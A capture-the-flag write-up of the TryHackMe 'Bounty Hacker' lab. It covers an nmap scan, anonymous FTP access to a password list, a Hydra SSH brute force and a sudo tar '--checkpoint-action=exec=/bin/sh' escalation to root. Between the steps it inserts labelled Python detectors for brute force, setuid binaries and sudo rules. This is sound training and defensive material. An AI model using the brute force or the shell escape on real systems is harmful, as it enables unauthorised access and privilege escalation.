
Bounty Hacker writeup [thm]

Bounty Hacker

You talked a big game about being the most elite hacker in the solar system. Prove it and claim your right to the status of Elite Bounty Hacker!

You were boasting on and on about your elite hacker skills in the bar and a few Bounty Hunters decided they'd take you up on claims! Prove your status is more than just a few glasses at the bar. I sense bell peppers & beef in your future!

Bounty Hacker is yet another simple beginner-friendly challenge from THM. Let's get right to it.

Find open ports on the machine

We run a nmap scan against the server:

$: nmap -A $target 

Host is up (0.048s latency).
Not shown: 967 filtered ports, 30 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| Can't get directory listing: TIMEOUT
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.9.5.219
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 dc:f8:df:a7:a6:00:6d:18:b0:70:2b:a5:aa:a6:14:3e (RSA)
|   256 ec:c0:f2:d9:1e:6f:48:7d:38:9a:e3:bb:08:c4:0c:c9 (ECDSA)
|_  256 a4:1a:15:a5:d4:b1:cf:8f:16:50:3a:7d:d0:d8:13:c2 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

So we have FTP, SSH and a web server to play with. We start with the web server. It's worth a look, but there is nothing of interest to be found there.

Who wrote the task list?

What task list? There's no task list that I could find on the website so let's try the FTP server. According to the nmap scan it allows anonymous login.

$: ftp $target       

Connected to $target.
220 (vsFTPd 3.0.3)
Name ($target:[REDACTED]): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-rw-r--    1 ftp     ftp     418 Jun 07  2020 locks.txt
-rw-rw-r--    1 ftp     ftp      68 Jun 07  2020 task.txt

We found the task list. Download both files locks.txt and task.txt.

task.txt:

    1.) Protect Vicious.
    2.) Plan for Red Eye pickup on the moon.

    -lin

So we have a good candidate for a username we can use in later attacks.

What service can you bruteforce with the text file found?

Clearly it's SSH.

What is the users password?

The contents of locks.txt look like they could be passwords. So we have a list of 26 passwords to try in combination with the username lin. We could do it manually, but we let Hydra do the heavy lifting for us.

$: hydra -V -l lin -P locks.txt $target -t 4 ssh                              

[22][ssh] host: $target   login: lin   password: [REDACTED] 
1 of 1 target successfully completed, 1 valid password found

Yay, it worked, we have a password!
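Seen from the other side of the wire, the Hydra run above is a short burst of failed SSH logins for one user from one source, followed by a success. The following detector is an added example (not part of the original writeup or of any tool it mentions): it parses sshd lines from auth.log and raises a medium alert for a burst of failures and a high alert when the same source then logs in successfully. The log lines, the hostname, the addresses and the year used for the syslog timestamps are all constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of /var/log/auth.log lines (not taken from the target machine).
# A password list run like the Hydra attempt above shows up as a burst of
# "Failed password" lines for one user from one source, then an "Accepted" line.
SAMPLE_AUTH_LOG = """\
Jun  7 14:02:01 bountyhacker sshd[1201]: Failed password for lin from 10.0.0.5 port 40210 ssh2
Jun  7 14:02:01 bountyhacker sshd[1202]: Failed password for lin from 10.0.0.5 port 40212 ssh2
Jun  7 14:02:02 bountyhacker sshd[1203]: Failed password for lin from 10.0.0.5 port 40214 ssh2
Jun  7 14:02:02 bountyhacker sshd[1204]: Failed password for lin from 10.0.0.5 port 40216 ssh2
Jun  7 14:02:03 bountyhacker sshd[1205]: Failed password for lin from 10.0.0.5 port 40218 ssh2
Jun  7 14:02:03 bountyhacker sshd[1206]: Accepted password for lin from 10.0.0.5 port 40220 ssh2
Jun  7 14:30:11 bountyhacker sshd[1300]: Failed password for lin from 10.0.0.9 port 50001 ssh2
Jun  7 15:10:42 bountyhacker sshd[1400]: Accepted publickey for lin from 10.0.0.9 port 50100 ssh2
"""

# Matches sshd's "Failed/Accepted <method> for [invalid user] <user> from <src> port <n>" lines.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+"
)


def parse_events(text, year=2020):
    """Turn raw auth.log text into event dicts. Syslog timestamps carry no year,
    so one is supplied (2020 here is an assumption made for the sample)."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not an sshd authentication line
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append({"ts": ts, "result": m["result"], "method": m["method"],
                       "user": m["user"], "src": m["src"]})
    return events


def detect_bruteforce(events, threshold=5, window=timedelta(seconds=60)):
    """Alert on sources with >= threshold failed logins inside a sliding window,
    and escalate when such a source subsequently logs in successfully."""
    recent = defaultdict(list)  # src -> timestamps of failures still inside the window
    flagged = set()             # sources already reported, to avoid repeating the medium alert
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        fails = recent[ev["src"]]
        while fails and ev["ts"] - fails[0] > window:
            fails.pop(0)  # failure fell out of the window
        if ev["result"] == "Failed":
            fails.append(ev["ts"])
            if len(fails) >= threshold and ev["src"] not in flagged:
                flagged.add(ev["src"])
                alerts.append({"severity": "medium", "src": ev["src"], "user": ev["user"],
                               "reason": f"{len(fails)} failed logins within {window.seconds}s"})
        elif ev["result"] == "Accepted" and len(fails) >= threshold:
            alerts.append({"severity": "high", "src": ev["src"], "user": ev["user"],
                           "reason": "successful login right after a burst of failures "
                                     "(password likely guessed)"})
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(parse_events(SAMPLE_AUTH_LOG)):
        print(alert)
```

Against the sample the single stray failure from 10.0.0.9 never reaches the threshold, while 10.0.0.5 produces one medium and one high alert; on a real host, feed the function the output of `journalctl -u ssh` or the auth.log file and tune threshold and window to the login rate you actually see.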

user.txt

We can now SSH into the server using the password obtained from Hydra.

$: ssh lin@$target  

lin@bountyhacker:~/Desktop$ cat user.txt 
[REDACTED]

root.txt

Time for some privilege escalation. We try the old trick of looking for files with SETUID permissions:

lin@bountyhacker:~/.config$ find / -user root -perm /4000 2>/dev/null 

/usr/sbin/pppd
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/sudo
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/oxide-qt/chrome-sandbox
/usr/lib/snapd/snap-confine
/bin/fusermount
/bin/su
/bin/mount
/bin/ping
/bin/ping6
/bin/umount

Alright, nothing looks out of the ordinary and all of the candidates for privilege escalation are properly locked down.
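Deciding that "nothing looks out of the ordinary" is easier when the list is diffed against a known-good baseline instead of eyeballed. The script below is an added example, not something from the writeup or from the room: it reproduces the `find / -user root -perm /4000` filter with `os.lstat`, then reports setuid-root binaries that are not in an expected set and expected ones that are missing. The baseline is assumed from the listing above; the `FileRecord` records in the test are constructed, and `/opt/unknown-helper` is a hypothetical path.

```python
import os
import stat
from dataclasses import dataclass

# Expected setuid-root binaries, taken from the listing in the writeup above.
# On a real host, build this set from a clean image of the same release.
EXPECTED_SUID = {
    "/usr/sbin/pppd", "/usr/bin/chfn", "/usr/bin/passwd", "/usr/bin/chsh",
    "/usr/bin/gpasswd", "/usr/bin/pkexec", "/usr/bin/newgrp", "/usr/bin/sudo",
    "/usr/lib/policykit-1/polkit-agent-helper-1", "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/xorg/Xorg.wrap", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/x86_64-linux-gnu/oxide-qt/chrome-sandbox", "/usr/lib/snapd/snap-confine",
    "/bin/fusermount", "/bin/su", "/bin/mount", "/bin/ping", "/bin/ping6", "/bin/umount",
}


@dataclass(frozen=True)
class FileRecord:
    """The three stat fields the audit needs; constructed records work just like real ones."""
    path: str
    mode: int  # st_mode, including file type and permission bits
    uid: int   # st_uid


def is_setuid_root(rec):
    """Same condition as `find -user root -perm /4000`."""
    return bool(rec.mode & stat.S_ISUID) and rec.uid == 0


def scan_filesystem(root="/"):
    """Walk the tree, skipping pseudo-filesystems and unreadable directories,
    and yield a FileRecord for every regular file."""
    skip = {"/proc", "/sys", "/dev"}
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda err: None):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in skip]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode):
                yield FileRecord(path, st.st_mode, st.st_uid)


def audit_suid(records, baseline=EXPECTED_SUID):
    """Diff the setuid-root binaries found against the baseline."""
    found = {r.path for r in records if is_setuid_root(r)}
    return {"unexpected": sorted(found - baseline), "missing": sorted(baseline - found)}


if __name__ == "__main__":
    result = audit_suid(scan_filesystem("/"))
    print("unexpected setuid-root binaries:", result["unexpected"])
    print("expected but missing:", result["missing"])
```

Anything under "unexpected" is what deserves the closer look; a setuid bit on a file that is not root-owned (the fourth constructed record in the test) is deliberately ignored, as it would be by the `find` command.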

What programs, if any, are we allowed to run as root?

lin@bountyhacker:~/Desktop$ sudo -l
[sudo] password for lin: 
Matching Defaults entries for lin on bountyhacker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:
    /usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User lin may run the following commands on bountyhacker:
    (root) /bin/tar

We can run tar as root!

Sudo (tar) If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

- GTFOBins

By running:

$: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

We got r00t.

$: whoami
root
$: cd /root 
$: cat root.txt
[REDACTED]

Feels damn good to be an Elite Bounty Hacker.
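The root cause here is a sudoers rule that hands root to a program which can launch other programs, exactly the class GTFOBins catalogues. The audit below is an added example and not code from the writeup or from GTFOBins: it parses `sudo -l` output, flags rules for such binaries unless sudo's NOEXEC tag is present, and flags unrestricted `ALL` rules. The sample output is constructed after the one above, with two extra rules added to exercise the checks; the set of flagged binaries contains only tar, the one binary the page discusses, and is meant to be extended from GTFOBins.

```python
import os
import re

# Constructed `sudo -l` output modelled on the one in the writeup above; the
# systemctl, NOEXEC and ALL rules are added here to exercise the checks.
SAMPLE_SUDO_L = r"""Matching Defaults entries for lin on bountyhacker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User lin may run the following commands on bountyhacker:
    (root) /bin/tar
    (root) NOPASSWD: /usr/bin/systemctl restart apache2
    (root) NOEXEC: /bin/tar
    (ALL : ALL) ALL
"""

# One rule line: "(runas) [TAG: ...] command [args]"
SUDO_RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z_]+:\s+)*)(?P<cmd>\S.*)$"
)

# Binaries that can exec another program on the caller's behalf when run under sudo.
# Only tar is taken from the page (its --checkpoint-action=exec option); extend from GTFOBins.
SHELL_ESCAPE_BINARIES = {"tar"}


def parse_sudo_l(text):
    """Extract the rule lines from `sudo -l` output, ignoring the Defaults block."""
    rules = []
    for line in text.splitlines():
        m = SUDO_RULE_RE.match(line)
        if m:
            rules.append({
                "runas": m["runas"].strip(),
                "tags": {t.rstrip(":") for t in m["tags"].split()},
                "cmd": m["cmd"].strip(),
            })
    return rules


def audit_sudo_rules(rules):
    """Return (command, reason) pairs for rules that need attention."""
    findings = []
    for r in rules:
        if r["cmd"] == "ALL":
            findings.append((r["cmd"], f"unrestricted sudo: any command as {r['runas']}"))
            continue
        prog = os.path.basename(r["cmd"].split()[0])
        if prog in SHELL_ESCAPE_BINARIES and "NOEXEC" not in r["tags"]:
            findings.append((r["cmd"], f"{prog} can exec arbitrary programs as {r['runas']}; "
                                       "remove the rule or add the NOEXEC tag"))
    return findings


if __name__ == "__main__":
    for cmd, reason in audit_sudo_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"{cmd}: {reason}")
```

On the sample, the plain tar rule and the ALL rule are reported and the NOEXEC variant is not. The corresponding hardened sudoers line would read `lin ALL=(root) NOEXEC: /bin/tar`; sudo's noexec works by preloading a library that blocks execve in the child, so it only protects dynamically linked binaries, and removing the rule altogether is the safer fix.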

Conclusion

Bounty Hacker is an OK beginner challenge following the typical nmap -> get some info -> hydra -> shell -> privesc route. The privesc took me a few minutes to get right, but apart from that it almost felt a bit too easy. I think it's good practice nevertheless, even though it wasn't very challenging.

One improvement is that I'm getting better at keeping markdown notes of what I'm doing every step of the way. These notes are verbose and also include things that didn't work and why they didn't work. If I don't finish a challenge in one sitting, it gets a whole lot easier to get back into it at a later time.

Doing public writeups also becomes less of a hassle: I pretty much delete all of the irrelevant parts and add some comments if necessary.

It's a good little challenge. It's probably more fun if you are a complete beginner and have never seen Hydra or GTFOBins before.